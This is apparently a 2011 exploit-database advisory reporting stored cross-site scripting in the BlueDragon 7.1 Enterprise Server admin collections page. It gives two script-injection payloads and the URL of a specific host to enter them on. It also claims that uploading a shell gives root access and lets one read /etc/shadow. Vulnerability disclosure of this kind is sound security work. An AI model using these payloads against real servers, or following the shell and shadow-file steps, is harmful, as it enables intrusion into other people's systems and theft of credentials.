# Exploit Title: BlueDragon 7.1 Enterprise Server JX Multiple XSS Vulnerabilities
# Google Dork:
# Cost : 5999$
# Date: 01/08/2011
# Author: www.newatlanta.com/bluedragon/
# Software Link: www.newatlanta.com/bluedragon/
# Version: 7.1
# Tested on: Windows 7 , Ubuntu 11
# CVE :
# Exploit Discovered : SubhashDasyam
# Website : http://www.subhashdasyam.com

http://scotspine.viviotech.net:8080/bluedragon/admin/collections.cfm
In the Name of Collections Enter XSS String like 

<BODY ONLOAD=alert('XSS')>
"><< <script>alert('XSS');</script>">

Demo Screen Shot
http://i54.tinypic.com/k2ec05.png

This Enterprise Server Costs you 5999$ per license still there is no Security 

You Get Root Access to the Server if you Upload a Shell 

One can Access the Shadow File etc  /etc/shadow